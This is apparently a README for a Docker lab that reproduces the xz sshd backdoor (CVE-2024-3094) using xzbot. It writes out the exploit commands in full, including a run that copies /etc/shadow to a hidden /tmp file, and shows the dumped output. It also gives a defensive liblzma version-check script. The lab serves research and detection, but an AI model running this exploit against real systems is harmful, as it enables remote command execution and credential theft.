Docker testbed for xz backdoor (CVE-2024-3094) - xzbot
This repository builds a Docker testbed for the xz sshd backdoor, based on amlweems' incredible reverse engineering work on the xz backdoor (xzbot).
Do not forget to fetch the submodule; see the top-level README for more info.
```sh
git submodule update --init --recursive
```
Docker compose will:
- Create a patched version of `liblzma.so.5.6.1` as described here
- Create a vulnerable container with an openssh server, copying in the patched `liblzma.so.5.6.1`
- Create an attack container with `xzbot` ready to be used
Build:
```sh
make
```
Execute the backdoor
The ed448 key pair is generated from a random seed. Information on the key and its seed is printed and stored in `/exploit/ed448info.txt`.
```sh
# print the seed recorded at key generation time
docker exec xzbackdoor-poc sed \
  -n 's/^Seed: \([0-9][0-9]*\)/\1/p' /exploit/ed448info.txt
# run xzbot against the vulnerable container, substituting the seed printed above
docker exec xzbackdoor-poc /exploit/xzbot/xzbot \
  -addr xzbackdoor-vulnerable:22 \
  -seed "<seed>" \
  -cmd "cat /etc/shadow > /tmp/.xz"
```
The run ends with an SSH handshake error; this is expected, since the command has already been executed on the server side, as the next step confirms:
```text
2024/04/02 19:13:59 ssh: handshake failed: EOF
```
Check results
```sh
docker exec xzbackdoor-vulnerable cat /tmp/.xz
```
```text
root:*:19793:0:99999:7:::
daemon:*:19793:0:99999:7:::
bin:*:19793:0:99999:7:::
sys:*:19793:0:99999:7:::
sync:*:19793:0:99999:7:::
games:*:19793:0:99999:7:::
man:*:19793:0:99999:7:::
lp:*:19793:0:99999:7:::
mail:*:19793:0:99999:7:::
news:*:19793:0:99999:7:::
uucp:*:19793:0:99999:7:::
proxy:*:19793:0:99999:7:::
www-data:*:19793:0:99999:7:::
backup:*:19793:0:99999:7:::
list:*:19793:0:99999:7:::
irc:*:19793:0:99999:7:::
_apt:*:19793:0:99999:7:::
nobody:*:19793:0:99999:7:::
sshd:!:19814::::::
```
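For the defender's side of the same testbed, the following triage script can be sourced inside `xzbackdoor-vulnerable` to confirm which liblzma the sshd binary actually loads and whether it is one of the affected releases. This is an added example, not part of xzbot or this testbed; it assumes the two affected upstream releases are 5.6.0 and 5.6.1 and that `ldd` prints the usual `name => path (addr)` lines.

```shell
#!/bin/sh
# Added example (not part of xzbot or this testbed): triage whether an sshd
# binary is linked against an xz-utils release that shipped the backdoor.
# Assumptions: affected upstream releases are 5.6.0 and 5.6.1 (CVE-2024-3094),
# and ldd prints lines of the form
#   liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5 (0x00007f...)

# 0 if the liblzma version string is one of the known-backdoored releases.
lzma_version_backdoored() {
    case "$1" in
        5.6.0|5.6.1) return 0 ;;
        *)           return 1 ;;
    esac
}

# Read ldd output on stdin and print the resolved liblzma path (first match).
lzma_path_from_ldd() {
    sed -n 's/^[[:space:]]*liblzma\.so[^=]*=>[[:space:]]*\([^ ]*\).*/\1/p' | head -n 1
}

# Version taken from the real file name; symlinks are followed when the file
# exists (liblzma.so.5 -> liblzma.so.5.6.1), otherwise the name is parsed as given.
lzma_version_from_path() {
    p="$1"
    if [ -e "$p" ]; then p="$(readlink -f "$p")"; fi
    printf '%s\n' "$p" | sed -n 's/.*liblzma\.so\.\([0-9][0-9.]*\)$/\1/p'
}

# Exit status: 0 = affected release linked, 1 = not affected, 2 = no liblzma.
# Usage inside the container (file name check.sh is assumed):
#   . ./check.sh && check_sshd_lzma
check_sshd_lzma() {
    sshd_bin="${1:-$(command -v sshd)}"
    path="$(ldd "$sshd_bin" 2>/dev/null | lzma_path_from_ldd)"
    if [ -z "$path" ]; then
        echo "no liblzma linked into $sshd_bin"
        return 2
    fi
    ver="$(lzma_version_from_path "$path")"
    echo "sshd=$sshd_bin liblzma=$path version=${ver:-unknown}"
    lzma_version_backdoored "$ver"
}
```

A matching version is a triage signal only: distributions backport fixes without bumping the file name, and a hand-patched library like the one in this testbed keeps the 5.6.1 name, so confirm against the distribution advisory or a byte-level signature check.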
Interactively play with the patching script
```sh
docker exec -it xzbackdoor-poc bash
. /opt/venv/bin/activate
python3 /exploit/patch/patch.py
```
```text
usage: patch.py [-h] [-s SEED] path
patch.py: error: the following arguments are required: path
```
Clean everything up
```sh
make clean
```
Compile a patched openssh-portable to create a honeypot and test the backdoor.